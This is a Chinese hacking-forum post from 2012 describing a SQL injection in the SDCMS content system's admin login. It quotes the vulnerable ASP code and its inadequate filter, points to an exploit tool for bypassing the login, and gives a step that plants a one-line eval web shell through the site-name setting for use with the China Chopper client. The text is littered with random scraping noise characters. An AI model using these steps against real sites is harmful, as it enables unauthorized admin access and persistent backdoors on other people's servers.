作者:T00LS 鬼哥
1 v6 n9 K& [: P; O2 b n2 K漏洞文件:后台目录/index.asp8 B' Y# c$ D, Y0 q X
' t5 r7 V/ D$ _* b
Sub Check
: x$ j2 K+ t: i# ^% b Dim username,password,code,getcode,Rs4 }. B6 Q9 b! ^! @+ C# ~8 o4 C
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
" r* o$ t5 g( O, T username=FilterText(Trim(Request.Form("username")),1)) Z5 Z; @% Q! p& m( V
password=FilterText(Trim(Request.Form("password")),1)
1 v# Q5 ?4 j. C& o- w code=Trim(Request.Form("yzm"))
+ [# i8 O6 J: {1 m5 j/ ^. i/ u getcode=Session("SDCMSCode")
, }; B, {! z# b7 J+ O IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died! R3 B$ i( @1 ~; N; ^
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied, e0 l* M' a. c3 \3 [
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied: P8 s/ [' Z' N0 y/ W! V- o: L
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
( G. K2 V. B# e IF username="" or password="" Then6 v# x) v+ U$ J4 V# ^
Echo "用户名或密码不能为空"ied
, ~3 F: u2 h+ T Else
: v. q! }9 O2 h/ F$ T2 X Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")$ t& d/ F- O: R; s
IF Rs.Eof Then
: t/ M, ^7 I; C$ x r6 H AddLog username,GetIp,"登录失败",1
8 N* E6 c# A# G& q Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"" v5 t% v- ]$ h/ M3 T" m
Else
! Q* [8 I% ~ X Add_Cookies "sdcms_id",Rs(0)- o" V E! [; r0 z! X
Add_Cookies "sdcms_name",username
! l3 ]5 t u- l9 g( C Add_Cookies "sdcms_pwd",Rs(2) b/ M, F2 G- p( A% ]5 I9 x, M
Add_Cookies "sdcms_admin",Rs(3)
9 q6 @& O* ^: }8 D Add_Cookies "sdcms_alllever",Rs(4)
. W5 X, l. n# J1 R8 n5 r- k* H K Add_Cookies "sdcms_infolever",Rs(5)2 \9 k+ |! Z# Z$ d) s
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
$ E* {6 r: S2 R2 j. m+ F- l/ b AddLog username,GetIp,"登录成功",1
7 y3 B: \$ K2 P8 r '自动删除30天前的Log记录
' N3 F; ~) P1 p4 g- X& R& B, D IF Sdcms_DataType Then( x- k9 r# R- ]0 n4 @9 _
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")7 A2 N: p7 o+ r
Else: F$ C; y) w" i! C
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")- Q! C, t2 [; w5 X+ m& I1 H% @; s
End IF
3 }1 V' _$ [; X# r Go("sdcms_index.asp")
& c w& Y' S+ u( v: d End IF
( H3 O2 p" K, Z: E Rs.Close9 i4 ~5 c2 m3 n% L# }
Set Rs=Nothing" @) O3 B$ ?7 J$ h% W& [2 ?! t9 @
End IF: h/ J& K1 a2 C7 O7 _9 e
End Sub* v! ?! m* X: n" \ D& u( X
; q8 R0 m! H0 _ _2 |
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
/ L9 D$ `$ _6 [9 [1 ^, M1 v1 z! W- n6 a4 Z/ P
Function FilterText(ByVal t0,ByVal t1)# e, E0 A# u/ S- Z) [4 s3 [
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
. Y: d: u; b; ` t0=Trim(t0)
* k9 i6 G3 P& _2 V( n: ~+ C Select Case t1( v( E: C. V' Z
Case "1"+ f% f2 n+ C! d& N8 C8 @% U
t0=Replace(t0,Chr(32),"")
* s6 G& X5 ?. u. I' k9 ]+ y6 Y t0=Replace(t0,Chr(13),"")# t9 a5 i0 [* d5 Z3 S- r7 c
t0=Replace(t0,Chr(10)&Chr(10),"")# h& v$ `$ v ]1 o) l: c, x" n$ S7 W
t0=Replace(t0,Chr(10),"")
' i0 f9 n3 K* X6 T6 E5 \" e* t Case "2"
0 J9 \ V- o$ b9 A7 [6 u( m# N+ Z- ^ t0=Replace(t0,Chr(8),"")'回格
, s( | v5 O) a$ q/ D t0=Replace(t0,Chr(9),"")'tab(水平制表符)
5 e v5 [$ A$ F1 p& f. L t0=Replace(t0,Chr(10),"")'换行
% n/ d# b. w" y# ^5 `) p t0=Replace(t0,Chr(11),"")'tab(垂直制表符); f- H+ H8 y5 k6 {
t0=Replace(t0,Chr(12),"")'换页
4 e# n7 G; g6 y D t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合. D& N0 x/ F! T0 B S) e0 g) m
t0=Replace(t0,Chr(22),"")
$ v5 s5 z6 a/ W0 T t0=Replace(t0,Chr(32),"")'空格 SPACE/ N. b+ Q {# i$ \' \2 j8 Y
t0=Replace(t0,Chr(33),"")'!
' M8 k' h' E4 u& X. `+ { t0=Replace(t0,Chr(34),"")'"
! E, ~* `* ~6 I1 F; v+ [# O: w t0=Replace(t0,Chr(35),"")'# d3 n7 ?; D d, D6 `9 g. z
t0=Replace(t0,Chr(36),"")'$5 ~7 C) b1 V2 G; }- h
t0=Replace(t0,Chr(37),"")'%
2 `0 [8 p0 `) Z4 m. P1 n( E1 | t0=Replace(t0,Chr(38),"")'&$ Y: m" c( B- C
t0=Replace(t0,Chr(39),"")''
3 z) ^3 ^* C, H6 D4 |. X) b8 p7 S- Y t0=Replace(t0,Chr(40),"")'(
1 N, z6 f# h) Q t0=Replace(t0,Chr(41),"")')9 N; Q# Z+ m! A1 m
t0=Replace(t0,Chr(42),"")'*0 K3 p7 w4 F) T$ Q- `0 r' p3 s8 Q' w; p
t0=Replace(t0,Chr(43),"")'+
) o k/ d; R& b) t' F9 N t0=Replace(t0,Chr(44),"")',
* W: N9 g) ?' I- T* [& x) i, G t0=Replace(t0,Chr(45),"")'-! b4 }9 S' C3 {+ t4 ?% T0 _# a
t0=Replace(t0,Chr(46),"")'.
$ ]5 e& G+ }% j4 n {1 z2 E( m t0=Replace(t0,Chr(47),"")'/
( E# g' i9 h" |& P# h t0=Replace(t0,Chr(58),"")':
& M2 c* S. R/ U6 i t0=Replace(t0,Chr(59),"")';) c" w! Y4 R% N j
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
C% Z$ f" P: Q$ H t0=Replace(t0,Chr(63),"")'? q" R3 ^, b8 \3 A4 P
t0=Replace(t0,Chr(64),"")'@- H3 l$ |7 \$ u* J6 `
t0=Replace(t0,Chr(91),"")'\2 l. G+ N9 g; T m+ l
t0=Replace(t0,Chr(92),"")'\, E: p8 \3 T- F
t0=Replace(t0,Chr(93),"")']4 G/ c" R; d i9 |
t0=Replace(t0,Chr(94),"")'^5 d" U% p7 a; [& _% G! Y
t0=Replace(t0,Chr(95),"")'_
) B6 ?1 {# t4 Y. B4 N) [* N t0=Replace(t0,Chr(96),"")'`
8 J( V% F5 f4 v t0=Replace(t0,Chr(123),"")'{* D$ f- \& K0 f# _; J
t0=Replace(t0,Chr(124),"")'|& F: f: ?5 k5 n1 Z+ I
t0=Replace(t0,Chr(125),"")'}" i* r# n5 P4 Y, n/ C
t0=Replace(t0,Chr(126),"")'~6 P! X9 e* l7 I9 _, Y
Case Else
1 Q& |" d8 j1 F8 X3 E9 b; | t0=Replace(t0, "&", "&")$ O8 _8 w9 C5 s$ S
t0=Replace(t0, "'", "'")
( o- B! s# h( s0 v( o( b t0=Replace(t0, """", """)
' h0 y% ~; {* a t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
0 u* S2 v' G) y End Select: o7 i7 |+ f: W
IF Instr(Lcase(t0),"expression")>0 Then: U1 ~8 N0 o* p8 [7 Z* v
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)$ s# G: w, l( K; X H& N* S9 Y5 Z5 X4 K
End If
2 Q# o" `4 g9 `: w: P FilterText=t0
Z1 S: }6 y* G8 ~: zEnd Function
# f% \0 ~# u- o) d# y( \* `
r& t& C6 n" W0 T看到没。直接参数是1 只过滤
# P1 k+ E) @2 b. Q* R# H t0=Replace(t0,Chr(32)," ")
, @" A0 G8 L/ M t0=Replace(t0,Chr(13),"")9 r: y6 Y7 ]4 j. d# W8 I
t0=Replace(t0,Chr(10)&Chr(10),"7 [+ D6 P# G- y$ O9 q6 k/ H# D! ~
")
0 S! b2 y* F/ c! e7 n: n6 [' G t0=Replace(t0,Chr(10),"
- L/ q5 L( k+ h$ v+ W- ~+ J. Z: J")
, L: }( Z4 T9 U9 {9 S; T' ?# p- |+ t漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
" i0 Z! t: t$ d/ d2 aEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP. i' x! U* G9 z# c1 {2 ]
3 ?9 Q. }+ b7 W3 k6 |! h测试:' B }' Z" F$ U; R2 V
: h5 C- F6 t0 D6 e* b( C% }
7 i1 j/ N8 K8 s. P0 r, x9 x8 z, H
现在输入工具上验证码,然后点OK
- J$ ^% H& v/ u; s) ~
7 c( [, p3 m+ t
0 ~+ b1 X$ q* |: a$ o2 P: j2 Z看到我们直接进入后台管理界面了,呵呵!
& }: }" k4 K% O& E0 X; U Y. H3 W0 J$ X& f5 P0 s# A
, c, p( D t% O0 H3 W4 K8 ~0 T" _
+ A" J! g+ C% b6 Y
这样直接进入后台了。。。。
/ D% B5 _6 i; J7 s9 w5 H
. i# Q0 _8 N, U$ G% T! l
) A- {! _1 G. j* _0 T& {
& s4 B6 B. C3 S4 R H6 w' sSDCMS提权:0 U0 x# X2 `# G" R2 \
, g- W9 A: m6 D, Z: P$ _5 h, ]5 \+ f: g方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
5 t8 Y, \1 `7 h( _8 S1 `, L+ J0 G: v6 A: C
/ o+ o8 D+ c5 A! Z0 k6 P
: T& s1 G, L3 @8 TOK,现在用菜刀连接下!
+ K5 E; a, E1 W! W* y5 S w& S
+ h' s( h6 o* R! r* \0 \
, H: a; _; V- n( H) v4 S) e$ ]" m! _( i: d
: Z: p- X. e$ r) I- B; W; P; m; S7 d9 w. F$ _, l
|
发表于 2012-11-9 20:57:02
收藏
支持
反对